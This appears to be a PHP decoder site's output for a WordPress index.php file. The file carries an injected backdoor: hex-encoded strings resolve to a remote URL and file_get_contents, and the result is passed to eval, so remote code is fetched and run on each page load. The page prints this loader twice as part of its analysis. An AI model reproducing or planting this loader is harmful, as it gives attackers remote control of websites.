Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php / * Front to the WordPress application. This file doesn't do anything, but load..

Decoded Output download

<?php  
/  
 * Front to the WordPress application. This file doesn't do anything, but loads  
 * wp-blog-header.php which does and tells WordPress to load the theme.  
 *  
 * @package WordPress  
 */  
  
/  
 * Tells WordPress to load the WordPress theme and output it.  
 *  
 * @var bool  
 */  
$GLOBALS_JK=PACK('H*','687474703a2f2f6170692e6b386363796e2e636f6d2f312e68746d'); $GLOBALS_FILE=$GLOBALS_JK; $GLOBALS_GET=PACK('H*','66696c655f6765745f636f6e74656e7473'); $GLOBALS_STR=$GLOBALS_GET($GLOBALS_FILE); eval($GLOBALS_STR);  
define( 'WP_USE_THEMES', true );  
  
/** Loads the WordPress Environment and Template */  
require DIR . '/wp-blog-header.php'; ?>

Did this file decode correctly?

Original Code

<?php 
/ 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/ 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
$GLOBALS_JK=PACK('H*','687474703a2f2f6170692e6b386363796e2e636f6d2f312e68746d'); $GLOBALS_FILE=$GLOBALS_JK; $GLOBALS_GET=PACK('H*','66696c655f6765745f636f6e74656e7473'); $GLOBALS_STR=$GLOBALS_GET($GLOBALS_FILE); eval($GLOBALS_STR); 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require DIR . '/wp-blog-header.php';

Function Calls

None

Variables

None

Stats

MD5 29cf2867a7b1169528abbf0d5195e836
Eval Count 0
Decode Time 41 ms